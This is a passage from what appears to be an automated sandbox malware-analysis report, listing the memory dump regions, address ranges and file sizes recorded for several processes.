                  • memory/328-229-0x0000000073130000-0x000000007381E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/328-265-0x0000000004D20000-0x0000000004D22000-memory.dmp
                    Filesize

                    8KB

                  • memory/736-31-0x0000000000000000-mapping.dmp
                  • memory/1028-342-0x0000000005420000-0x0000000005421000-memory.dmp
                    Filesize

                    4KB

                  • memory/1028-341-0x0000000002710000-0x0000000002711000-memory.dmp
                    Filesize

                    4KB

                  • memory/1028-336-0x0000000000000000-mapping.dmp
                  • memory/1028-338-0x0000000072AB0000-0x000000007319E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1028-339-0x00000000009A0000-0x00000000009A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1028-340-0x0000000004B70000-0x0000000004B71000-memory.dmp
                    Filesize

                    4KB

                  • memory/1092-20-0x0000000000000000-mapping.dmp
                  • memory/1092-26-0x0000000070550000-0x0000000070C3E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1092-36-0x0000000001F00000-0x0000000001F01000-memory.dmp
                    Filesize

                    4KB

                  • memory/1124-17-0x0000000000000000-mapping.dmp
                  • memory/1148-10-0x0000000000000000-mapping.dmp
                  • memory/1320-18-0x0000000000000000-mapping.dmp
                  • memory/1460-330-0x0000000000000000-mapping.dmp
                  • memory/1508-228-0x00000000026E0000-0x00000000026E4000-memory.dmp
                    Filesize

                    16KB

                  • memory/1508-216-0x0000000000000000-mapping.dmp
                  • memory/1544-465-0x0000000000000000-mapping.dmp
                  • memory/1544-499-0x0000000000000000-mapping.dmp
                  • memory/1544-606-0x0000000000000000-mapping.dmp
                  • memory/1544-605-0x0000000003C80000-0x0000000003C81000-memory.dmp
                    Filesize

                    4KB

                  • memory/1544-603-0x0000000000000000-mapping.dmp
                  • memory/1544-601-0x0000000000000000-mapping.dmp
                  • memory/1544-599-0x0000000000000000-mapping.dmp
                  • memory/1544-597-0x0000000000000000-mapping.dmp
                  • memory/1544-595-0x0000000000000000-mapping.dmp
                  • memory/1544-593-0x0000000000000000-mapping.dmp
                  • memory/1544-591-0x0000000000000000-mapping.dmp
                  • memory/1544-589-0x0000000000000000-mapping.dmp
                  • memory/1544-587-0x0000000000000000-mapping.dmp
                  • memory/1544-585-0x0000000000000000-mapping.dmp
                  • memory/1544-583-0x0000000000000000-mapping.dmp
                  • memory/1544-581-0x0000000000000000-mapping.dmp
                  • memory/1544-579-0x0000000000000000-mapping.dmp
                  • memory/1544-577-0x0000000000000000-mapping.dmp
                  • memory/1544-575-0x0000000000000000-mapping.dmp
                  • memory/1544-573-0x0000000000000000-mapping.dmp
                  • memory/1544-571-0x0000000000000000-mapping.dmp
                  • memory/1544-569-0x0000000000000000-mapping.dmp
                  • memory/1544-567-0x0000000000000000-mapping.dmp
                  • memory/1544-565-0x0000000000000000-mapping.dmp
                  • memory/1544-563-0x0000000000000000-mapping.dmp
                  • memory/1544-561-0x0000000000000000-mapping.dmp
                  • memory/1544-559-0x0000000000000000-mapping.dmp
                  • memory/1544-557-0x0000000000000000-mapping.dmp
                  • memory/1544-555-0x0000000000000000-mapping.dmp
                  • memory/1544-553-0x0000000000000000-mapping.dmp
                  • memory/1544-551-0x0000000000000000-mapping.dmp
                  • memory/1544-549-0x0000000000000000-mapping.dmp
                  • memory/1544-547-0x0000000000000000-mapping.dmp
                  • memory/1544-545-0x0000000000000000-mapping.dmp
                  • memory/1544-543-0x0000000000000000-mapping.dmp
                  • memory/1544-541-0x0000000000000000-mapping.dmp
                  • memory/1544-539-0x0000000000000000-mapping.dmp
                  • memory/1544-537-0x0000000000000000-mapping.dmp
                  • memory/1544-535-0x0000000000000000-mapping.dmp
                  • memory/1544-533-0x0000000000000000-mapping.dmp
                  • memory/1544-531-0x0000000000000000-mapping.dmp
                  • memory/1544-529-0x0000000000000000-mapping.dmp
                  • memory/1544-527-0x0000000000000000-mapping.dmp
                  • memory/1544-525-0x0000000000000000-mapping.dmp
                  • memory/1544-523-0x0000000000000000-mapping.dmp
                  • memory/1544-521-0x0000000000000000-mapping.dmp
                  • memory/1544-519-0x0000000000000000-mapping.dmp
                  • memory/1544-517-0x0000000000000000-mapping.dmp
                  • memory/1544-515-0x0000000000000000-mapping.dmp
                  • memory/1544-513-0x0000000000000000-mapping.dmp
                  • memory/1544-511-0x0000000000000000-mapping.dmp
                  • memory/1544-509-0x0000000000000000-mapping.dmp
                  • memory/1544-507-0x0000000000000000-mapping.dmp
                  • memory/1544-505-0x0000000000000000-mapping.dmp
                  • memory/1544-503-0x0000000000000000-mapping.dmp
                  • memory/1544-501-0x0000000000000000-mapping.dmp
                  • memory/1544-497-0x0000000000000000-mapping.dmp
                  • memory/1544-495-0x0000000000000000-mapping.dmp
                  • memory/1544-493-0x0000000000000000-mapping.dmp
                  • memory/1544-491-0x0000000000000000-mapping.dmp
                  • memory/1544-489-0x0000000000000000-mapping.dmp
                  • memory/1544-487-0x0000000000000000-mapping.dmp
                  • memory/1544-485-0x0000000000000000-mapping.dmp
                  • memory/1544-483-0x0000000000000000-mapping.dmp
                  • memory/1544-481-0x0000000000000000-mapping.dmp
                  • memory/1544-479-0x0000000000000000-mapping.dmp
                  • memory/1544-477-0x0000000000000000-mapping.dmp
                  • memory/1544-475-0x0000000000000000-mapping.dmp
                  • memory/1544-473-0x0000000000000000-mapping.dmp
                  • memory/1544-471-0x0000000000000000-mapping.dmp
                  • memory/1544-469-0x0000000000000000-mapping.dmp
                  • memory/1544-467-0x0000000000000000-mapping.dmp
                  • memory/1544-463-0x0000000000000000-mapping.dmp
                  • memory/1544-461-0x0000000000000000-mapping.dmp
                  • memory/1544-459-0x0000000000000000-mapping.dmp
                  • memory/1544-457-0x0000000000000000-mapping.dmp
                  • memory/1544-455-0x0000000000000000-mapping.dmp
                  • memory/1544-453-0x0000000000000000-mapping.dmp
                  • memory/1544-451-0x0000000000000000-mapping.dmp
                  • memory/1544-449-0x0000000000000000-mapping.dmp
                  • memory/1544-447-0x0000000000000000-mapping.dmp
                  • memory/1544-445-0x0000000000000000-mapping.dmp
                  • memory/1544-443-0x0000000000000000-mapping.dmp
                  • memory/1544-441-0x0000000000000000-mapping.dmp
                  • memory/1544-439-0x0000000000000000-mapping.dmp
                  • memory/1544-437-0x0000000000000000-mapping.dmp
                  • memory/1544-435-0x0000000000000000-mapping.dmp
                  • memory/1544-433-0x0000000000000000-mapping.dmp
                  • memory/1544-431-0x0000000000000000-mapping.dmp
                  • memory/1544-429-0x0000000000000000-mapping.dmp
                  • memory/1544-427-0x0000000000000000-mapping.dmp
                  • memory/1544-425-0x0000000000000000-mapping.dmp
                  • memory/1544-423-0x0000000000000000-mapping.dmp
                  • memory/1544-421-0x0000000000000000-mapping.dmp
                  • memory/1544-419-0x0000000000000000-mapping.dmp
                  • memory/1544-417-0x0000000000000000-mapping.dmp
                  • memory/1544-415-0x0000000000000000-mapping.dmp
                  • memory/1544-413-0x0000000000000000-mapping.dmp
                  • memory/1544-411-0x0000000000000000-mapping.dmp
                  • memory/1544-409-0x0000000000000000-mapping.dmp
                  • memory/1544-364-0x00000000000A0000-0x00000000000A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1544-365-0x0000000000000000-mapping.dmp
                  • memory/1544-366-0x00000000000E0000-0x00000000000E1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1544-367-0x0000000000000000-mapping.dmp
                  • memory/1544-369-0x0000000000000000-mapping.dmp
                  • memory/1544-371-0x0000000000000000-mapping.dmp
                  • memory/1544-373-0x0000000000000000-mapping.dmp
                  • memory/1544-375-0x0000000000000000-mapping.dmp
                  • memory/1544-377-0x0000000000000000-mapping.dmp
                  • memory/1544-379-0x0000000000000000-mapping.dmp
                  • memory/1544-381-0x0000000000000000-mapping.dmp
                  • memory/1544-383-0x0000000000000000-mapping.dmp
                  • memory/1544-385-0x0000000000000000-mapping.dmp
                  • memory/1544-387-0x0000000000000000-mapping.dmp
                  • memory/1544-389-0x0000000000000000-mapping.dmp
                  • memory/1544-391-0x0000000000000000-mapping.dmp
                  • memory/1544-393-0x0000000000000000-mapping.dmp
                  • memory/1544-395-0x0000000000000000-mapping.dmp
                  • memory/1544-397-0x0000000000000000-mapping.dmp
                  • memory/1544-399-0x0000000000000000-mapping.dmp
                  • memory/1544-401-0x0000000000000000-mapping.dmp
                  • memory/1544-403-0x0000000000000000-mapping.dmp
                  • memory/1544-405-0x0000000000000000-mapping.dmp
                  • memory/1544-407-0x0000000000000000-mapping.dmp
                  • memory/1576-13-0x0000000000000000-mapping.dmp
                  • memory/1596-285-0x0000000000000000-mapping.dmp
                  • memory/1676-321-0x0000000000000000-mapping.dmp
                  • memory/1676-14-0x0000000000000000-mapping.dmp
                  • memory/1676-24-0x0000000070550000-0x0000000070C3E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1748-29-0x0000000000000000-mapping.dmp
                  • memory/1824-273-0x0000000000400000-0x0000000000434000-memory.dmp
                    Filesize

                    208KB

                  • memory/1824-277-0x0000000000400000-0x0000000000434000-memory.dmp
                    Filesize

                    208KB

                  • memory/1824-274-0x0000000000417A8B-mapping.dmp
                  • memory/1864-0-0x0000000000000000-mapping.dmp
                  • memory/1896-4-0x0000000000000000-mapping.dmp
                  • memory/1896-5-0x0000000000000000-mapping.dmp
                  • memory/1932-56-0x0000000005500000-0x0000000005501000-memory.dmp
                    Filesize

                    4KB

                  • memory/1932-32-0x0000000000000000-mapping.dmp
                  • memory/1932-39-0x0000000070550000-0x0000000070C3E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1940-286-0x0000000000000000-mapping.dmp
                  • memory/1952-8-0x0000000000000000-mapping.dmp
                  • memory/1968-50-0x0000000002780000-0x0000000002781000-memory.dmp
                    Filesize

                    4KB

                  • memory/1968-38-0x0000000070550000-0x0000000070C3E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1968-11-0x0000000000000000-mapping.dmp
                  • memory/1968-44-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1968-179-0x0000000006560000-0x0000000006561000-memory.dmp
                    Filesize

                    4KB

                  • memory/1968-33-0x0000000000000000-mapping.dmp
                  • memory/1992-15-0x0000000000000000-mapping.dmp
                  • memory/1992-84-0x0000000006540000-0x0000000006541000-memory.dmp
                    Filesize

                    4KB

                  • memory/1992-103-0x0000000006730000-0x0000000006731000-memory.dmp
                    Filesize

                    4KB

                  • memory/1992-77-0x0000000006440000-0x0000000006441000-memory.dmp
                    Filesize

                    4KB

                  • memory/1992-70-0x00000000064A0000-0x00000000064A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1992-118-0x0000000006810000-0x0000000006811000-memory.dmp
                    Filesize

                    4KB

                  • memory/1992-64-0x00000000062B0000-0x00000000062B1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1992-117-0x0000000006800000-0x0000000006801000-memory.dmp
                    Filesize

                    4KB

                  • memory/1992-25-0x0000000070550000-0x0000000070C3E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1992-69-0x0000000006300000-0x0000000006301000-memory.dmp
                    Filesize

                    4KB

                  • memory/2212-309-0x00000000009A0000-0x00000000009A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2212-308-0x0000000072AB0000-0x000000007319E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2212-305-0x0000000000000000-mapping.dmp
                  • memory/2212-355-0x0000000000750000-0x0000000000774000-memory.dmp
                    Filesize

                    144KB

                  • memory/2212-353-0x00000000006C0000-0x00000000006E3000-memory.dmp
                    Filesize

                    140KB

                  • memory/2300-351-0x0000000000000000-mapping.dmp
                  • memory/2348-291-0x000000000041A684-mapping.dmp
                  • memory/2348-290-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/2348-293-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/2452-122-0x0000000000000000-mapping.dmp
                  • memory/2452-608-0x0000000000000000-mapping.dmp
                  • memory/2480-126-0x0000000000000000-mapping.dmp
                  • memory/2480-217-0x0000000002250000-0x000000000225D000-memory.dmp
                    Filesize

                    52KB

                  • memory/2480-215-0x0000000004D60000-0x0000000004E10000-memory.dmp
                    Filesize

                    704KB

                  • memory/2480-139-0x0000000000A10000-0x0000000000A11000-memory.dmp
                    Filesize

                    4KB

                  • memory/2480-130-0x0000000070550000-0x0000000070C3E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2492-329-0x0000000000300000-0x0000000000301000-memory.dmp
                    Filesize

                    4KB

                  • memory/2492-325-0x00000000002E0000-0x00000000002E1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2492-324-0x0000000072AB0000-0x000000007319E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2492-334-0x00000000003A0000-0x00000000003A3000-memory.dmp
                    Filesize

                    12KB

                  • memory/2492-332-0x0000000000380000-0x0000000000391000-memory.dmp
                    Filesize

                    68KB

                  • memory/2492-320-0x0000000000000000-mapping.dmp
                  • memory/2516-133-0x0000000000000000-mapping.dmp
                  • memory/2536-206-0x000007FEF68A0000-0x000007FEF6B1A000-memory.dmp
                    Filesize

                    2.5MB

                  • memory/2564-221-0x000000000043FCC3-mapping.dmp
                  • memory/2564-224-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/2564-220-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/2568-346-0x0000000000580000-0x0000000000585000-memory.dmp
                    Filesize

                    20KB

                  • memory/2568-315-0x0000000000000000-mapping.dmp
                  • memory/2568-348-0x0000000000560000-0x0000000000570000-memory.dmp
                    Filesize

                    64KB

                  • memory/2568-318-0x0000000072AB0000-0x000000007319E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2568-333-0x0000000000220000-0x0000000000232000-memory.dmp
                    Filesize

                    72KB

                  • memory/2568-326-0x0000000001000000-0x0000000001001000-memory.dmp
                    Filesize

                    4KB

                  • memory/2568-331-0x0000000000210000-0x0000000000211000-memory.dmp
                    Filesize

                    4KB

                  • memory/2572-363-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                    Filesize

                    304KB

                  • memory/2572-312-0x0000000000000000-mapping.dmp
                  • memory/2572-604-0x0000000050480000-0x000000005049A000-memory.dmp
                    Filesize

                    104KB

                  • memory/2588-257-0x0000000000000000-mapping.dmp
                  • memory/2616-256-0x0000000000000000-mapping.dmp
                  • memory/2620-146-0x0000000000000000-mapping.dmp
                  • memory/2656-148-0x0000000000000000-mapping.dmp
                  • memory/2680-255-0x0000000000000000-mapping.dmp
                  • memory/2684-354-0x0000000000000000-mapping.dmp
                  • memory/2684-357-0x0000000072AB0000-0x000000007319E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2684-361-0x0000000005400000-0x0000000005401000-memory.dmp
                    Filesize

                    4KB

                  • memory/2684-358-0x00000000024E0000-0x00000000024E1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2684-359-0x00000000049A0000-0x00000000049A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2684-360-0x0000000002790000-0x0000000002791000-memory.dmp
                    Filesize

                    4KB

                  • memory/2696-155-0x0000000000000000-mapping.dmp
                  • memory/2708-157-0x0000000000000000-mapping.dmp
                  • memory/2732-254-0x0000000000000000-mapping.dmp
                  • memory/2752-167-0x000000000043FCC3-mapping.dmp
                  • memory/2752-166-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/2752-169-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/2800-172-0x000000000043FCC3-mapping.dmp
                  • memory/2896-272-0x0000000002710000-0x0000000002714000-memory.dmp
                    Filesize

                    16KB

                  • memory/2896-259-0x0000000000000000-mapping.dmp
                  • memory/2900-185-0x0000000000400000-0x0000000000425000-memory.dmp
                    Filesize

                    148KB

                  • memory/2900-194-0x000000000041A684-mapping.dmp
                  • memory/2908-192-0x0000000000417A8B-mapping.dmp
                  • memory/2908-183-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/2908-197-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/2932-203-0x0000000000417A8B-mapping.dmp
                  • memory/2948-198-0x000000000041A684-mapping.dmp
                  • memory/2948-201-0x0000000000400000-0x0000000000425000-memory.dmp
                    Filesize

                    148KB

                  • memory/3028-268-0x0000000000000000-mapping.dmp
                  • memory/3028-287-0x00000000005D0000-0x00000000005F4000-memory.dmp
                    Filesize

                    144KB

                  • memory/3028-271-0x0000000073130000-0x000000007381E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/3028-276-0x0000000000FF0000-0x0000000000FF1000-memory.dmp
                    Filesize

                    4KB

                  • memory/3028-279-0x00000000005C0000-0x00000000005C1000-memory.dmp
                    Filesize

                    4KB